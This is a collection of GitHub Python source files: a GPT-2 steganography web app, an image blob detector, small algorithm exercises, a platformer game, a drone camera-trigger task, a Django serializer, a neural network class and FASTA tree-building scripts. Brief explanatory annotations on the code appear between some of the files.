_finder_job(f)\n","repo_name":"znatty22/vaccine-finder","sub_path":"vaccine_finder/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74271184043","text":"from flask import Flask, render_template, request\nfrom utils import get_model\nfrom run_single import encoder, decoder\n\napp = Flask(__name__)\nenc, model = get_model(model_name='gpt2')\n@app.route(\"/\", methods=[\"GET\"])\ndef get_form():\n return render_template(\"form.html\")\n\n@app.route(\"/form\", methods=[\"POST\"])\ndef post_form():\n res = dict(request.form)\n \n try:\n\t if res['method'] == 'encrypt':\n\t text = encoder(res['message'], res['context'], enc, model)\n\t elif res['method'] == 'decrypt':\n\t \ttext = decoder(res['message'], res['context'], enc, model)\n\t else: \n\t \ttext='babalay'\n except Exception as e:\n\t text = e\n return render_template(\"form.html\", text=text, context=res['context'])\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"danwhale/Public-Key-Neural-Steganography","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
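Annotation: interpWeights/interpolate above implement the well-known scipy idiom of precomputing Delaunay simplices and barycentric weights once, then reusing them to interpolate every frame, much cheaper than calling griddata per frame. A standalone rendering of the same idiom on random data (modern scipy exposes Delaunay from scipy.spatial rather than the qhull submodule the record imports):

import numpy as np
from scipy.spatial import Delaunay

rng = np.random.default_rng(1)
xy = rng.random((200, 2))                      # scattered sample locations
uv = rng.random((50, 2))                       # query points (a flattened grid)

tri = Delaunay(xy)                             # build once ...
simplex = tri.find_simplex(uv)
verts = np.take(tri.simplices, simplex, axis=0)
temp = np.take(tri.transform, simplex, axis=0)
bary = np.einsum('njk,nk->nj', temp[:, :2, :], uv - temp[:, 2])
wts = np.hstack([bary, 1 - bary.sum(axis=1, keepdims=True)])

values = np.sin(xy[:, 0] * 6)                  # ... then interpolate any number of fields
interp = np.einsum('nj,nj->n', np.take(values, verts), wts)
interp[np.any(wts < 0, axis=1)] = np.nan       # queries outside the convex hull
print(interp[:5])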
+{"seq_id":"3413037391","text":"#!/usr/bin/env python\nif __name__ != '__main__': raise Exception(\"Do not import me!\") # noqa: E701\n# ruff: noqa: E402\n\nmissing = []\ntry:\n from cvargparse import Arg\n from cvargparse import BaseParser\nexcept ImportError:\n missing.append(\"cvargparse~=0.5\")\n\ntry:\n import skimage # noqa: F401\nexcept ImportError:\n missing.append(\"scikit-image\")\n\ntry:\n import PyQt5 # noqa: F401\nexcept ImportError:\n missing.append(\"pyqt5\")\n\nif missing:\n print(\"Please install additional packages to use this script:\")\n print(\"pip install \" + \" \".join(missing))\n exit()\n\nimport cv2\n\nfrom matplotlib import pyplot as plt\n\nfrom blob_detector import utils\nfrom blob_detector.core.binarizers import BinarizerType\nfrom blob_detector.core.pipeline import Pipeline\n\n\ndef main(args):\n img_proc = Pipeline()\n img_proc.find_border()\n if args.min_size > 0:\n img_proc.rescale(min_size=args.min_size, min_scale=0.1)\n\n img_proc.preprocess(equalize=False, sigma=args.sigma)\n img_proc.binarize(\n type=BinarizerType.gauss_local,\n use_masked=True,\n use_cv2=True,\n window_size=args.window_size,\n offset=args.C,\n )\n\n img_proc.remove_border()\n img_proc.open_close(\n kernel_size=args.morph_kernel,\n iterations=args.morph_iters)\n\n bbox_proc = Pipeline()\n bbox_proc.detect(use_masked=True)\n\n _, splitter = bbox_proc.split_bboxes(\n preproc=Pipeline(), detector=Pipeline())\n\n _, bbox_filter = bbox_proc.bbox_filter(\n score_threshold=0.5,\n nms_threshold=0.3,\n enlarge=args.enlarge,\n )\n _, scorer = bbox_proc.score()\n\n img_proc.requires_input(splitter.set_image)\n img_proc.requires_input(bbox_filter.set_image)\n img_proc.requires_input(scorer.set_image)\n\n im = cv2.imread(args.file_path, cv2.IMREAD_COLOR)\n gray_im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n res = img_proc(gray_im)\n\n if args.show_intermediate:\n utils.show_intermediate(res, masked=args.show_masked, separate=args.show_separate)\n\n detections = bbox_proc(res)\n\n if args.show_intermediate:\n utils.show_intermediate(detections, masked=args.show_masked, separate=args.show_separate)\n\n fig, ax0 = plt.subplots()\n ax0.imshow(cv2.cvtColor(im, cv2.COLOR_BGR2RGB))\n\n for bbox in detections.bboxes:\n if not bbox.active:\n continue\n bbox.plot(im, ax=ax0, edgecolor=\"blue\")\n\n plt.show()\n plt.close()\n\n\n\nparser = BaseParser([\n Arg(\"file_path\"),\n\n Arg.int(\"--min_size\", \"-size\", default=1080),\n Arg.int(\"--C\", \"-C\", default=2),\n Arg.int(\"--window_size\", \"-ws\", default=31),\n Arg.float(\"--sigma\", \"-sig\", default=5.0),\n Arg.int(\"--morph_kernel\", \"-mk\", default=5),\n Arg.int(\"--morph_iters\", \"-mi\", default=2),\n Arg.float(\"--enlarge\", default=0.01),\n\n Arg.flag(\"--show_intermediate\", \"-intermediate\"),\n Arg.flag(\"--show_masked\", \"-masked\"),\n Arg.flag(\"--show_separate\", \"-separate\"),\n\n])\n\nmain(parser.parse_args())\n\n\n\n","repo_name":"cvjena/blob_detector","sub_path":"blob_detector/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"43837257104","text":"#!/usr/bin/env python\nfrom os import path\n\nimport setuptools\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\n\nfrom metasdk import info\n\nhere = 
path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md')) as f:\n long_description = f.read()\n\npackages = [\n 'metasdk',\n 'metasdk.tools',\n 'metasdk.logger',\n 'metasdk.services'\n]\n\ninstall_reqs = parse_requirements('requirements.txt')\nreqs = install_reqs\n\nsetuptools.setup(\n name=info.__package_name__,\n version=info.__version__,\n\n description='Devision Meta SDK',\n long_description=long_description,\n\n url='https://github.com/devision-io/metasdk',\n\n author='Artur Geraschenko',\n author_email='arturgspb@gmail.com',\n\n license='MIT',\n\n classifiers=[\n 'Programming Language :: Python :: 3'\n ],\n install_requires=reqs,\n packages=packages,\n package_data={'': ['LICENSE']},\n package_dir={'metasdk': 'metasdk'},\n include_package_data=True,\n)\n","repo_name":"devision-io/metasdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15481437339","text":"#!/usr/bin/python\n\nimport math\n\ndef recipe_batches(recipe, ingredients):\n max_batches = 0\n\n recipe_keys = set(recipe.keys())\n ingredients_keys = set(ingredients.keys())\n\n\n common_ingredients = set(recipe_keys).intersection(set(ingredients_keys))\n# first thing we want to check is if we even have the ingredients for the recipe in the first place.\n if len(common_ingredients) != len(recipe):\n return 0\n for key, value in ingredients.items():\n if not key in recipe:\n continue\n batch = value // recipe[key]\n\n if max_batches is 0 or batch < max_batches:\n max_batches = batch\n return max_batches\n # for key , value in recipe.items():\n # print(ingredients[key])\n # if key != ingredients[key]:\n # print(f\"We are missing an ingredient {ingredients.items()}\")\n\n\n\nif __name__ == '__main__':\n # Change the entries of these dictionaries to test\n # your implementation with different inputs\n recipe = { 'milk': 100, 'butter': 50, 'flour': 5}\n ingredients = { 'milk': 132, 'butter': 48, 'flour': 51 }\n print(\"{batches} batches can be made from the available ingredients: {ingredients}.\".format(batches=recipe_batches(recipe, ingredients), ingredients=ingredients))\n","repo_name":"ChrisDelf/Algorithms","sub_path":"recipe_batches/recipe_batches.py","file_name":"recipe_batches.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"38375050870","text":"from datetime import datetime\nimport collections\n\n\nclass Solution:\n def minPartitions(self, n: str) -> int:\n answer = 0\n for i in n:\n ii = int(i)\n if ii == 9:\n return ii\n else:\n if ii > answer:\n answer = ii\n return answer\n\n\n\nif __name__ == \"__main__\":\n start_time = datetime.now()\n sol = Solution()\n print(minPartitions(\"32\"))\n\n end_time = datetime.now()\n print('Duration: {}'.format(end_time - start_time))","repo_name":"koba4444/leetcode","sub_path":"n01689.py","file_name":"n01689.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74077540524","text":"def rotate(matrix) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n temp = [list(i) for i in list(zip(*matrix))]\n print(temp)\n res = []\n for i in temp:\n print(i[::-1])\n res.append(i[::-1])\n \n for i in range(len(matrix)):\n for j in range(len(matrix[i])):\n 
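Annotation: recipe_batches above is the classic "minimum over floor divisions" problem; note the record compares with `max_batches is 0`, which only works for small ints via CPython interning and should be `== 0`. The whole function collapses to one guarded expression:

def recipe_batches(recipe, ingredients):
    if not recipe or not set(recipe) <= set(ingredients):
        return 0                                    # a missing ingredient means no batches
    return min(ingredients[k] // recipe[k] for k in recipe)

print(recipe_batches({'milk': 100, 'butter': 50, 'flour': 5},
                     {'milk': 132, 'butter': 48, 'flour': 51}))   # -> 0 (butter is short)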
matrix[i][j] = res[i][j]\n\nrotate([[1,2,3],[4,5,6],[7,8,9]])","repo_name":"Alfy102/leetcodePractice","sub_path":"Arrays/rotateMatrixInPlace/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12258424600","text":"\"\"\"\nPlatformer Game\n\"\"\"\nimport arcade\n\n# Constants\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 650\nSCREEN_TITLE = \"Doge Game\"\n\n# Constants used to scale our sprites from their original size\nCHARACTER_SCALING = 1\nTILE_SCALING = 0.5\nCOIN_SCALING = 0.5\n\nSPRITE_PIXEL_SIZE = 128\nGRID_PIXEL_SIZE = (SPRITE_PIXEL_SIZE * TILE_SCALING)\n\n# Movement speed of player, in pixels per frame\n#PLAYER_MOVEMENT_SPEED = 10\nGRAVITY = 1\n#PLAYER_JUMP_SPEED = 20\n\n# How many pixels to keep as a minimum margin between the character\n# and the edge of the screen.\nLEFT_VIEWPORT_MARGIN = 200\nRIGHT_VIEWPORT_MARGIN = 200\nBOTTOM_VIEWPORT_MARGIN = 150\nTOP_VIEWPORT_MARGIN = 100\n\n# Karakterin Başlangıç yeri\nPLAYER_START_X = 64\nPLAYER_START_Y = 225\n\n\nclass MyGame(arcade.Window):\n \"\"\"\n Main application class.\n \"\"\"\n\n def __init__(self):\n\n # Call the parent class and set up the window\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)\n\n # Oyun müziği oyun açıldığında aktif ediliyor.\n self.gamesound = True\n\n # Karakterin zıplama ve hareket hızı\n self.playerspeed = 10\n self.playerjumpspeed = 20\n\n # These are 'lists' that keep track of our sprites. Each sprite should\n # go into a list.\n self.coin_list = None\n self.wall_list = None\n self.player_list = None\n\n self.foreground_list = None\n self.background_list = None\n self.dont_touch_list = None\n self.buz_list = None\n self.ladder_list = None\n\n\n # Separate variable that holds the player sprite\n self.player_sprite = None\n\n # Our physics engine\n self.physics_engine = None\n\n # Used to keep track of our scrolling\n self.view_bottom = 0\n self.view_left = 0\n\n # Keep track of the score\n self.score = 0\n\n # Keep track of the your dead\n self.donttouch_counter = 0\n\n # Where is the right edge of the map?\n self.end_of_map = None\n self.exit_of_game = None\n\n # Level\n self.level = 1 # Harita bittiğinde level artıyor ve diğer haritaya geçiyoruz.\n\n # Müzik efektleri\n self.collect_coin_sound = arcade.load_sound(\":resources:sounds/coin1.wav\")\n self.jump_sound = arcade.load_sound(\":resources:sounds/jump1.wav\")\n self.game_over = arcade.load_sound(\":resources:sounds/gameover1.wav\") #Yeni ses efektimiz. Karakter ölünce çalışıyor.\n self.background_sound = arcade.load_sound(\"C:/Users/duhan/Desktop/ÜNİVERSİTE/BEYKOZ/Beykoz2 Dönem2/Mühendislik Projesi 2/platform_tutorial/tothemoon.mp3\")\n\n def setup(self, level):\n \"\"\" Set up the game here. Call this function to restart the game. 
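Annotation: the rotate record above builds the rotated matrix via zip-transpose plus row reversal and then copies it back element by element; the copy can be a single slice assignment, which keeps the "modify in place" contract (same list object, callers see the change) without the nested loops:

def rotate(matrix):
    """Rotate a square matrix 90 degrees clockwise, mutating the caller's list."""
    matrix[:] = [list(row)[::-1] for row in zip(*matrix)]

m = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
rotate(m)
print(m)   # [[7, 4, 1], [8, 5, 2], [9, 6, 3]]

For a strict O(1)-extra-space solution one would instead transpose in place and then reverse each row, but the slice-assignment form is the idiomatic Python shortcut.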
\"\"\"\n\n # Used to keep track of our scrolling\n self.view_bottom = 0\n self.view_left = 0\n\n # Keep track of the score\n self.score = 0\n\n # Create the Sprite lists\n self.player_list = arcade.SpriteList()\n self.wall_list = arcade.SpriteList()\n self.coin_list = arcade.SpriteList()\n\n self.foreground_list = arcade.SpriteList() #foreground\n self.background_list = arcade.SpriteList() #background\n self.end_of_map = arcade.SpriteList()\n self.exit_of_game = arcade.SpriteList()\n self.buz_list = arcade.SpriteList()\n\n\n # Set up the player, specifically placing it at these coordinates.\n image_source = \"C:/Users/duhan/Desktop/ÜNİVERSİTE/BEYKOZ/Beykoz2 Dönem2/Mühendislik Projesi 2/platform_tutorial/yuruyendogem.png\"\n self.player_sprite = arcade.Sprite(image_source, CHARACTER_SCALING)\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.player_list.append(self.player_sprite)\n\n # --- Load in a map from the tiled editor ---\n\n # Name of the layer in the file that has our platforms/walls\n platforms_layer_name = 'Platforms'\n moving_platforms_layer_name = 'Moving Platforms'\n\n # Name of the layer that has items for pick-up\n coins_layer_name = 'DogeCoin'\n\n # Name of the layer that has items for foreground\n foreground_layer_name = 'Foreground'\n\n # Name of the layer that has items for background\n background_layer_name = 'Background'\n\n # Name of the layer that has items we shouldn't touch\n dont_touch_layer_name = \"Don't Touch\"\n\n # Name of the layer that has finish map\n end_layer_name = 'End'\n exit_layer_name = \"Exit\"\n\n #Icy (hard to walk on)\n buz_layer = 'Buz'\n\n # Map name\n map_name = f\"C:/Users/duhan/Desktop/ÜNİVERSİTE/BEYKOZ/Beykoz2 Dönem2/Mühendislik Projesi 2/platform_tutorial/map2_level_{level}.tmx\"\n\n # Read in the tiled map\n my_map = arcade.tilemap.read_tmx(map_name)\n\n # Calculate the right edge of the my_map in pixels\n # self.end_of_map = my_map.map_size.width * GRID_PIXEL_SIZE # !!!!!!!\n\n self.end_of_map = arcade.tilemap.process_layer(my_map,\n end_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n\n self.exit_of_game = arcade.tilemap.process_layer(my_map,\n exit_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Background\n self.background_list = arcade.tilemap.process_layer(my_map,\n background_layer_name,\n TILE_SCALING)\n # -- Background objects\n self.ladder_list = arcade.tilemap.process_layer(my_map,\n \"Ladders\",\n scaling=TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Foreground\n self.foreground_list = arcade.tilemap.process_layer(my_map,\n foreground_layer_name,\n TILE_SCALING)\n\n # -- Platforms\n self.wall_list = arcade.tilemap.process_layer(map_object=my_map,\n layer_name=platforms_layer_name,\n scaling=TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Moving Platforms #new\n moving_platforms_list = arcade.tilemap.process_layer(my_map, moving_platforms_layer_name, TILE_SCALING)\n for sprite in moving_platforms_list:\n self.wall_list.append(sprite)\n\n # -- Coins\n self.coin_list = arcade.tilemap.process_layer(my_map,\n coins_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Don't Touch Layer\n self.dont_touch_list = arcade.tilemap.process_layer(my_map,\n dont_touch_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n #new\n self.buz_list = arcade.tilemap.process_layer(map_object=my_map,\n layer_name=buz_layer,\n scaling=TILE_SCALING,\n use_spatial_hash=True)\n\n # --- Other stuff\n # The background color changes according to the level.\n\n if my_map.background_color:\n 
if(self.level==0):\n arcade.set_background_color(arcade.csscolor.BLACK)\n elif(self.level==1):\n arcade.set_background_color(arcade.csscolor.CORNFLOWER_BLUE)\n elif(self.level==2):\n arcade.set_background_color(arcade.csscolor.GRAY)\n elif(self.level==3):\n arcade.set_background_color(arcade.csscolor.SADDLE_BROWN)\n elif(self.level==4):\n arcade.set_background_color(arcade.csscolor.PURPLE)\n\n\n # Create the 'physics engine'\n self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite,\n self.wall_list,\n gravity_constant=GRAVITY,\n ladders=self.ladder_list)\n\n def on_draw(self):\n \"\"\" Render the screen. \"\"\"\n\n # Clear the screen to the background color\n arcade.start_render()\n\n # Draw our sprites --> Drawings\n self.wall_list.draw()\n self.background_list.draw()\n self.coin_list.draw()\n self.dont_touch_list.draw()\n self.player_list.draw()\n self.foreground_list.draw()\n self.end_of_map.draw()\n self.exit_of_game.draw()\n self.ladder_list.draw()\n self.buz_list.draw()\n\n # Draw our score on the screen, scrolling it with the viewport\n score_text = f\"Doge Coin: {self.score}\"\n arcade.draw_text(score_text, 10 + self.view_left, 10 + self.view_bottom,\n arcade.csscolor.BLACK, 18)\n\n dead_text = f\"Kalan Hakkınız: {5-self.donttouch_counter}\"\n arcade.draw_text(dead_text, 10 + self.view_left, 50 + self.view_bottom,\n arcade.csscolor.BLACK, 18)\n\n def on_key_press(self, key, modifiers):\n \"\"\"Called whenever a key is pressed. \"\"\"\n\n if key == arcade.key.UP or key == arcade.key.W or key == arcade.key.SPACE:\n if self.physics_engine.is_on_ladder():\n self.player_sprite.change_y = self.playerspeed\n elif self.physics_engine.can_jump():\n self.player_sprite.change_y = self.playerjumpspeed\n arcade.play_sound(self.jump_sound)\n elif key == arcade.key.DOWN or key == arcade.key.S:\n if self.physics_engine.is_on_ladder():\n self.player_sprite.change_y = -self.playerspeed\n elif key == arcade.key.LEFT or key == arcade.key.A:\n self.player_sprite.change_x = -self.playerspeed\n elif key == arcade.key.RIGHT or key == arcade.key.D:\n self.player_sprite.change_x = self.playerspeed\n\n\n def on_key_release(self, key, modifiers):\n \"\"\"Called when the user releases a key. 
\"\"\"\n\n if key == arcade.key.LEFT or key == arcade.key.A:\n self.player_sprite.change_x = 0\n elif key == arcade.key.RIGHT or key == arcade.key.D:\n self.player_sprite.change_x = 0\n\n def update(self, delta_time):\n \"\"\" Movement and game logic \"\"\"\n\n if (self.gamesound == True):\n arcade.play_sound(self.background_sound)\n self.gamesound = False\n\n # Move the player with the physics engine\n self.physics_engine.update()\n\n # Is there contact between the player and the coins?\n coin_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.coin_list)\n buz_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.buz_list)\n end_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.end_of_map)\n exit_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.exit_of_game)\n\n for end in end_hit_list:\n self.playerspeed = 10\n self.playerjumpspeed = 20\n\n for buz in buz_hit_list:\n self.playerspeed = 3\n self.playerjumpspeed = 5\n\n # Loop through each coin we hit (if any) and remove it\n for coin in coin_hit_list:\n # Remove the coin\n coin.remove_from_sprite_lists()\n # Play a sound\n arcade.play_sound(self.collect_coin_sound)\n # Add one to the score\n self.score += 1\n\n for exit in exit_hit_list:\n exit.remove_from_sprite_lists()\n self.level = 6\n self.setup(self.level)\n\n # Is there contact between the player and the flag?\n door_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.end_of_map)\n\n for door in door_hit_list:\n # Remove the flag\n door.remove_from_sprite_lists()\n # Play a sound\n # I'll add music later.\n # Increase the level.\n self.level += 1\n self.setup(self.level)\n\n # Track if we need to change the viewport\n changed_viewport = False\n\n # CHARACTER DEATH AND RESPAWN\n\n # Did the player fall off the map?\n if self.player_sprite.center_y < -1000:\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.donttouch_counter = self.donttouch_counter + 1 # Tracks your death count\n if (self.donttouch_counter == 5):\n self.level = 0\n self.donttouch_counter = 0\n # Set the camera to the start\n self.view_left = 0\n self.view_bottom = 0\n changed_viewport = True\n arcade.play_sound(self.game_over)\n\n\n # Did the player touch something they shouldn't have?\n if arcade.check_for_collision_with_list(self.player_sprite,\n self.dont_touch_list):\n self.player_sprite.change_x = 0\n self.player_sprite.change_y = 0\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.donttouch_counter = self.donttouch_counter + 1 # Tracks your death count\n if (self.donttouch_counter == 5):\n self.level = 0\n self.donttouch_counter = 0\n\n\n # Set the camera to the start\n self.view_left = 0\n self.view_bottom = 0\n changed_viewport = True\n arcade.play_sound(self.game_over)\n\n # Load the next level\n self.setup(self.level)\n\n # Set the camera to the start\n self.view_left = 0\n self.view_bottom = 0\n changed_viewport = True\n\n # --- Manage Scrolling ---\n\n # Scroll left\n left_boundary = self.view_left + LEFT_VIEWPORT_MARGIN\n if self.player_sprite.left < left_boundary:\n self.view_left -= left_boundary - self.player_sprite.left\n changed_viewport = True\n\n # Scroll right\n right_boundary = self.view_left + SCREEN_WIDTH - RIGHT_VIEWPORT_MARGIN\n if self.player_sprite.right > right_boundary:\n self.view_left += self.player_sprite.right - right_boundary\n changed_viewport = True\n\n # Scroll up\n top_boundary = 
self.view_bottom + SCREEN_HEIGHT - TOP_VIEWPORT_MARGIN\n if self.player_sprite.top > top_boundary:\n self.view_bottom += self.player_sprite.top - top_boundary\n changed_viewport = True\n\n # Scroll down\n bottom_boundary = self.view_bottom + BOTTOM_VIEWPORT_MARGIN\n if self.player_sprite.bottom < bottom_boundary:\n self.view_bottom -= bottom_boundary - self.player_sprite.bottom\n changed_viewport = True\n\n if changed_viewport:\n # Only scroll to integers. Otherwise we end up with pixels that\n # don't line up on the screen\n self.view_bottom = int(self.view_bottom)\n self.view_left = int(self.view_left)\n\n # Do the scrolling\n arcade.set_viewport(self.view_left,\n SCREEN_WIDTH + self.view_left,\n self.view_bottom,\n SCREEN_HEIGHT + self.view_bottom)\n\n\ndef main():\n \"\"\" Main method \"\"\"\n window = MyGame()\n window.setup(window.level)\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"duhankosali/Doge-Game_Python-Game-Project","sub_path":"pythonProject4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35007875652","text":"import math\n\nfrom PropertyTree import PropertyNode\nfrom rcUAS import wgs84\n\nimport comms.events\nfrom mission.task.task import Task\n\nd2r = math.pi / 180.0\n\nclass Camera(Task):\n def __init__(self, config_node):\n Task.__init__(self)\n self.imu_node = PropertyNode(\"/sensors/imu/0\")\n self.pos_node = PropertyNode(\"/position\")\n self.orient_node = PropertyNode(\"/orientation\")\n self.flight_node = PropertyNode(\"/controls/flight\")\n self.task_node = PropertyNode(\"/task\")\n self.comms_node = PropertyNode(\"/comms\")\n self.name = config_node.getString(\"name\")\n self.start_time = 0.0\n self.max_attitude = 20.0\n if config_node.hasChild(\"trigger\"):\n self.trigger_name = config_node.getString(\"trigger\")\n else:\n self.trigger_name = \"gear\"\n if config_node.hasChild(\"forward_fov_deg\"):\n self.forward_fov_deg = config_node.getDouble(\"forward_fov_deg\")\n if self.forward_fov_deg < 10: self.forward_fov_deg = 10\n if self.forward_fov_deg > 170: self.forward_fov_deg = 170\n else:\n self.forward_fov_deg = 60\n self.fov2_tan = math.tan(self.forward_fov_deg*0.5 * d2r)\n if config_node.hasChild(\"lateral_fov_deg\"):\n self.lateral_fov_deg = config_node.getDouble(\"lateral_fov_deg\")\n if self.lateral_fov_deg < 10: self.lateral_fov_deg = 10\n if self.lateral_fov_deg > 170: self.lateral_fov_deg = 170\n else:\n self.lateral_fov_deg = 60\n if config_node.hasChild(\"overlap\"):\n self.overlap = config_node.getDouble(\"overlap\")\n if self.overlap < 0: self.overlap = 0\n if self.overlap > 1: self.overlap = 1\n else:\n self.overlap = 0.7\n self.min_interval = 0.5\n self.max_interval = 10.0\n self.trigger_state = False\n self.trigger_time = 0.0\n self.last_lat = 0.0\n self.last_lon = 0.0\n \n def activate(self):\n self.active = True\n \n def update(self, dt):\n if not self.active:\n return False\n\n cur_time = self.imu_node.getDouble(\"timestamp\")\n force_trigger = False\n if self.trigger_state:\n # needs to be 0.3 with manual focus\n if cur_time > self.trigger_time + 0.3:\n # release trigger\n self.trigger_state = False\n self.flight_node.setDouble(self.trigger_name, 0.0)\n # camera shutter is triggered on release (after being\n # depressed for 0.3 seconds) so log the event here.\n comms.events.log(\"camera\", \"%.8f %.8f %.1f\" % \\\n (self.pos_node.getDouble('latitude_deg'),\n 
self.pos_node.getDouble('longitude_deg'),\n self.pos_node.getDouble('altitude_m')))\n return True\n else:\n if cur_time < self.trigger_time + self.min_interval:\n # min interval not yet elapsed\n return True\n elif cur_time >= self.trigger_time + self.max_interval:\n # print \" max interval force trigger\"\n force_trigger = True\n\n roll_deg = self.orient_node.getDouble(\"roll_deg\")\n pitch_deg = self.orient_node.getDouble(\"pitch_deg\")\n if abs(roll_deg) <= self.max_attitude and abs(pitch_deg) <= self.max_attitude:\n # if aircraft in a level enough configuration: compute\n # course and distance from previous trigger\n pos_lon = self.pos_node.getDouble(\"longitude_deg\")\n pos_lat = self.pos_node.getDouble(\"latitude_deg\")\n (course_deg, rev_deg, dist_m) = \\\n wgs84.geo_inverse( self.last_lat, self.last_lon,\n pos_lat, pos_lon )\n agl = self.pos_node.getDouble('altitude_agl_m')\n thresh_dist_m = 2 * self.fov2_tan * agl * (1.0 - self.overlap)\n if dist_m >= thresh_dist_m and self.task_node.getBool('is_airborne'):\n # if we are flying and have moved far enough\n # print \" distance based trigger:\", thresh_dist_m, dist_m\n force_trigger = True\n\n if force_trigger:\n self.last_lat = self.pos_node.getDouble('latitude_deg')\n self.last_lon = self.pos_node.getDouble('longitude_deg')\n self.trigger_time = cur_time\n self.trigger_state = True\n self.flight_node.setDouble(self.trigger_name, 0.68)\n \n def is_complete(self):\n return False\n \n def close(self):\n self.active = False\n return True\n","repo_name":"NorthStarUAS/rc-flight","sub_path":"src/mission/task/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"} +{"seq_id":"35531263571","text":"#Instance attributes and class attributes\nclass A():\n #Attributes defined here are class attributes; if there is no instance attribute with the same name, the class attribute is used\n name = 'a'\n def __init__(self,name):\n self.name = name\n self.haha = 1\n\na = A('haha')\nprint(a.name)\n#A class itself can only access class attributes\n#print(A.haha)\nprint(A.name)\ndel a.name\nprint(a.name)\n\n#Note: in general, do not give an instance attribute the same name as a class attribute, otherwise the instance attribute will shadow the class attribute\n\n","repo_name":"StarLord777/Python-OOP-High","sub_path":"OOP/13-对象属性和类属性.py","file_name":"13-对象属性和类属性.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41515547861","text":"from django.utils.encoding import smart_text, smart_bytes\nfrom rest_framework import serializers\n\nfrom app.models.certificate import Certificate, \\\n CERTIFICATE_PRIVATE_KEY_MAX_LENGTH\n\n\nclass PrivateKeyField(serializers.CharField):\n def to_representation(self, value):\n \"\"\"\n Convert the internal binary representation to the passed string.\n\n :param value: internal value\n :return: external representation\n \"\"\"\n return smart_text(value)\n\n def to_internal_value(self, data):\n \"\"\"\n Convert the passed string to the internal binary representation.\n\n :param data: object with request data\n :return: internal value\n \"\"\"\n private_key = str(data.get('private_key'))\n return smart_bytes(private_key)\n\n\nclass CertificateSerializer(serializers.ModelSerializer):\n \"\"\"\n A CertificateSerializer:\n - Allows reads to all fields.\n - Allows writes to all fields.\n \"\"\"\n private_key = PrivateKeyField(max_length=CERTIFICATE_PRIVATE_KEY_MAX_LENGTH)\n\n class Meta:\n model = Certificate\n fields = '__all__'\n\n\nclass CertificateUpdateSerializer(serializers.ModelSerializer):\n \"\"\"\n A CertificateUpdateSerializer:\n - Allows writes to 'active' only.\n \"\"\"\n\n class 
Meta:\n model = Certificate\n fields = ('active',)\n","repo_name":"hcourt/minicert","sub_path":"app/serialization/certificate.py","file_name":"certificate.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39220278363","text":"\nimport numpy as np\nimport numpy.random as rand\nimport scipy.special as ss\n\n\nclass NeuralNetwork:\n\n def __init__(self, inNodes, hidNodes, outNodes, alpha, beta, bias, outputActivationFun):\n\n self.iNodes = inNodes\n self.hNodes = hidNodes\n self.oNodes = outNodes\n\n # learning rate\n self.alpha = alpha\n self.beta = beta\n\n self.hWeights = rand.normal(0.0, 0.5, (self.hNodes, self.iNodes))\n self.hWeightsDelta = np.zeros((self.hNodes, self.iNodes))\n\n self.oWeights = rand.normal(0.0, 0.5, (self.oNodes, self.hNodes))\n self.oWeightsDelta = np.zeros((self.oNodes, self.hNodes))\n\n # turning on/off bias (default bias turned off)\n if bias is False:\n self.bias = 0\n self.hBias = np.zeros((self.hNodes, 1))\n self.hBiasDelta = 